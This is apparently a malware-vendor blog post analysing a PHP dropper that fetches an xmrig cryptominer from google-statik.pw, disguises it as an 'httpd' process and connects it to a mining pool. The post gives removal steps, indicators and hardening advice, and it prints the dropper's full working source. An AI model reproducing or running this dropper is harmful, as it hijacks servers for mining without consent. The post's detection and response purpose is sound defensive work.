This is again a new piece of malware, which we call cryptonight, that we have not seen before. It downloads an executable Linux program and hides it as an http daemon running in the background, which is difficult to spot in the process list at first glance.
Manual removal process
You can check whether there is a running httpd process that was started with the cryptonight parameter:
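# List the miner process (launched as ./httpd -a cryptonight ...) without the
# grep command itself showing up as a false hit; run as root so that processes
# of every user (including the web-server user) are visible.
ps aux | grep '[c]ryptonight'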
Then simply kill the process with `kill -9 <process_id>`, using root permissions. Note that the dropper shown below re-launches the miner whenever it runs and finds no cryptonight process in `ps aux`, so the downloaded `httpd` binary and the PHP dropper itself also have to be removed.
cryptonight downloader source code (PHP)
/*
 * Analyst notes on this sample (kept verbatim as found; it is a miner dropper
 * and must not be executed outside an isolated analysis environment).
 *
 * What the visible code does:
 *  - Builds $command: fetch a binary from http://google-statik.pw/mainer/xmrig
 *    with wget, save it as ./httpd, chmod +x it, and start it in the background
 *    as `./httpd -a cryptonight -o 178.32.145.31:8005 -u <wallet>.<rand()> -p x -k`
 *    with stderr merged into stdout. rand() is appended after the wallet
 *    address, presumably as a per-host worker id -- that part is an inference.
 *  - Probes for a working command-execution primitive by echoing the marker
 *    string 31313313125577 through system(), passthru(), shell_exec() and
 *    exec(), then the python_eval extension, the Perl extension,
 *    pcntl_fork()+pcntl_exec("/bin/sh","-c",...), proc_open() and popen(),
 *    and defines execCommand() on the first one whose output contains "25577".
 *    The sample therefore runs with whatever privileges the PHP process has.
 *  - Finally runs `ps aux`; if its output already contains "cryptonight" it
 *    prints "already started", otherwise it runs $command.
 *
 * Indicators for detection and response (all taken from this sample):
 *  - outbound HTTP to google-statik.pw and outbound TCP to 178.32.145.31:8005
 *  - a process named httpd whose argv contains "-a cryptonight -o 178.32.145.31:8005"
 *  - the literal marker 31313313125577, or the wallet address below, in web-server
 *    access logs, PHP files or uploaded content
 *  - a file named httpd in a directory writable by the web-server user
 *
 * Hardening that breaks this dropper: disabling system/passthru/shell_exec/
 * exec/proc_open/popen/pcntl_* via php.ini disable_functions, running PHP
 * under a user with no writable+executable directories, and egress filtering
 * from the web server (the download and the pool connection both need it).
 */
$command = "wget http://google-statik.pw/mainer/xmrig -O httpd ; chmod +x ./httpd ; ./httpd -a cryptonight -o 178.32.145.31:8005 -u 46uBZeVWU6jf7eEdSDxMb9ctVuBXBwXRu1AiTZt3AMbaJF5yrzuKnhxGbuPN6BfgUnYeQpqeRfMWnKH5orTdR8sk4pm2Jbo." . rand() . " -p x -k 2>&1 &"; if (strpos(system('echo 31313313125577') , '25577') > 0) { function execCommand($arg) { return system($arg); } } elseif (strpos(passthru('echo 31313313125577') , '25577') > 0) { function execCommand($arg) { return passthru($arg); } } elseif (strpos(shell_exec('echo 31313313125577') , '25577') > 0) { function execCommand($arg) { return shell_exec($arg); } } elseif (strpos(exec('echo 31313313125577') , '25577') > 0) { function execCommand($arg) { return exec($arg); } } elseif (function_exists('python_eval')) { function execCommand($arg) { return python_eval('import os; os.system(' . $arg . ');'); } } elseif (class_exists('Perl')) { function execCommand($arg) { $perl = new Perl(); $r = $perl->system($arg); print ($r); } } else { try { function execCommand($arg) { $p = @pcntl_fork(); if (!$p) { @pcntl_exec("/bin/sh", Array("-c",$arg)); } else { @pcntl_waitpid($p, $status); } } execCommand('echo 31313313125577'); } catch(Exception $e) { print_r($e); try { function execCommand($arg) { $p = array( array('pipe','r') , array('pipe','w') , array('pipe','w') ); $h = @proc_open($arg, $p, $pipes); if ($h && $pipes) { echo (fread($pipes[1], 4096)); echo (fread($pipes[2], 4096)); fclose($pipes[0]); fclose($pipes[1]); fclose($pipes[2]); proc_close($h); } } execCommand('echo 31313313125577'); } catch(Exception $e2) { print_r($e2); try { function execCommand($arg) { $h = @Popen('echo 31313313125577', 'r'); if ($h) { echo (fread($h, 4096)); } execCommand('echo 31313313125577'); } } catch(Exception $e3) { print_r($e3); } } } } if (strpos(execCommand("ps aux 2>&1 &") , 'cryptonight') > 0) { echo 'already started'; } else { echo execCommand($command); }
Final words
Use Malware Expert – Signatures to detect this malware in files for FREE!
Websites that use Malware Expert – ModSecurity rules are protected against this kind of attack.